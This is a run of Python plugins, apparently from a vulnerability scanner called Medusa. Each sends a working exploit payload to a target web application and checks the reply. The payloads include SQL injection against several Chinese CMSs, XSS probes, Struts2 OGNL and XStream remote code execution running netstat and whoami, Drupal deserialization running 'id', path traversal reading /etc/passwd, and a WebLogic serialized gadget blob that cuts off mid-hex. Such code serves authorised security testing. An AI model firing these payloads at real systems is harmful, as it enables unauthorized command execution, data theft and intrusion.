def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/m.php?m=User&a=doLogin"
payload_url = scheme + "://" + url + ":" + str(port) + payload
data = "origURL=xq17&password=xq17&email=xq17'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),concat(0x7e,md5(1)),floor(rand(0)*2))x from information_schema.tables group by x)a)and'"
resp = requests.post(payload_url,
headers=Headers,
data=data,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b1") != -1:
Medusa = "{}存在FanweSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm=randoms().result(10)
payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url ,headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find('<script>alert("'+rm+'")</script>') != -1 :
Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
#想要执行的命令
shell = "id"
data = """
{
"link": [
{
"value": "link",
"options": "O:24:\\"GuzzleHttp\\\\Psr7\\\\FnStream\\":2:{s:33:\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\";a:1:{s:5:\\"close\\";a:2:{i:0;O:23:\\"GuzzleHttp\\\\HandlerStack\\":3:{s:32:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\";s:%s:\\"%s\\";s:30:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\";a:1:{i:0;a:1:{i:0;s:6:\\"system\\";}}s:31:\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\";b:0;}i:1;s:7:\\"resolve\\";}}s:9:\\"_fn_close\\";a:2:{i:0;r:4;i:1;s:7:\\"resolve\\";}}"
}
],
"_links": {
"type": {
"href": "%s/rest/type/shortcut/default"
}
}
}""" % (len(shell), shell, scheme + "://" + url + ":" + str(port))
payload = '/node/?_format=hal_json'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Connection': 'keep-alive',
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/hal+json",
}
resp = requests.post(payload_url,
data=data,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
code = resp.status_code
res = resp.text
if code == 403 and res.find("message") != -1 and res.find(
"uid=") != -1 and res.find("gid=") != -1 and res.find(
"groups=") != -1:
Medusa = "{}存在Drupal远程执行代码漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n使用POC:{}\r\n返回结果:{}\r\n".format(
url, payload_url, data, res)
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)"
data = "status=1&order_sn=2"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.post(payload_url,headers=headers,data=data,timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33")!= -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
Payloads = ["/cmstop/apps/system/view/template/edit.php","/apps/system/view/template/edit.php"]
for payload in Payloads:
try:
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.get(payload_url, headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp.text
if con.find(' in <b>([^<]+)</b> on line <b>(\\d+)</b>') != -1:
Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
payload_url = scheme + "//" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url, headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('log4jConfigLocation') != -1 :
Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(rm)
payload_url = scheme + "://" + url +":"+ str(port) + payload
resp = requests.get(payload_url,headers=Headers,timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if con.find("<script>alert({})</script>".format(rm))!= -1:
Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/?m=api&a=userpreview'
data = "username=sqlinjectiontest' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5('sqlinjectiontest'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("526ae11a7ea509bd8338660e908ce9e0") != -1 :
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload1="/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd"
payload2 = "/a/b/master/..%252F..%252Fetc%252Fpasswd"
for i in [payload1, payload2]:
try:
payload_url = scheme + "://" + url +":"+ str(port)+ i
Headers['Accept']='*/*'
Headers['Connection']='close'
Headers["Upgrade-Insecure-Requests"]= "1"
resp = requests.get(payload_url,headers=Headers,proxies=proxies, timeout=6, verify=False,allow_redirects=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("root:x:")!=-1 and con.find("bin:x")!=-1 and con.find("lp:x")!=-1:
Medusa = "{} 存在Spring反射文件下载漏洞(CVE-2019-3799)\r\n漏洞地址:\r\n{}\r\n返回内容:\r\n{}".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload='''/%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an'''
try:
payload_url = scheme + "://" + url +":"+ str(port)+"/index.action"+payload
headers = {
'User-Agent': RandomAgent,
"Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.get(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
resilt=Result(con)
if resilt=="Linux" or resilt=="NoteOS" or resilt=="Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-033\r\n返回数据:{}\r\n部署系统:{}\r\n".format(url,con,resilt)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/flow.php?step=update_cart'
data = "goods_number%5B1%27+and+%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+md5(3.1415)%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1+%23%5D=1&submit=exp"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json",
}
resp = requests.post(payload_url,headers=headers, data=data,timeout=6, proxies=proxies, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("63e1f04640e83605c1d177544a5a0488")!= -1:
Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/demo.php?time=alert('f4aa169c58007f317b2de0b73cecbd92')"
payload_url = scheme + "://" + url +":"+ str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find("time:alert('f4aa169c58007f317b2de0b73cecbd92'),") != -1 :
Medusa = "{}存在CmsEasy跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/member/chat.php?touser=admin'
data = "forward=aaaa%2527),(12345678901234567890123456789012,(select%2574 md5(c)),%2527test2test2%2527,4%25275"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
resp = requests.post(payload_url,headers=Headers,data=data,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在DestoonSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/index.php?s=/Member/main.tml'
data = "realname[0]=exp&realname[1]=(select md5(c))"
payload_url = scheme + "://" + url +":"+ str(port)+ payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.post(payload_url,headers=headers,data=data, proxies=proxies,timeout=6, verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1 :
Medusa = "{}存在大米CMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url +":"+ str(port)+"/index.action"
headers = {
'User-Agent': RandomAgent,
"Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
resp = requests.get(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
con = resp.text
resilt=Result(con)
if resilt=="Linux" or resilt=="NoteOS" or resilt=="Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-045\r\n返回数据:{}\r\n部署系统:{}\r\n".format(url,con,resilt)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
data='''<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>whoami</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> '''
try:
payload_url = scheme + "://" + url +":"+ str(port)+"/index.action"
headers = {
'User-Agent': RandomAgent,
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Content-Type": "application/xml"
}
resp = requests.post(payload_url,headers=headers,data=data, timeout=6, proxies=proxies,verify=False)
con = resp.text
code = resp.status_code
if code==500 and con.find("java.security.Provider$Service")!=-1:
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-052\r\n返回数据:{}\r\n".format(url, payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(60)
payload = 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b42787057412418757200025b42acf317f8060854e0020000787000000c0daced0005737200176a6176612e7574696c2e4c696e6b656448617368536574d86cd75a95dd2a1e020000787200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000103f400000000000027372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e0020000787000000698cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475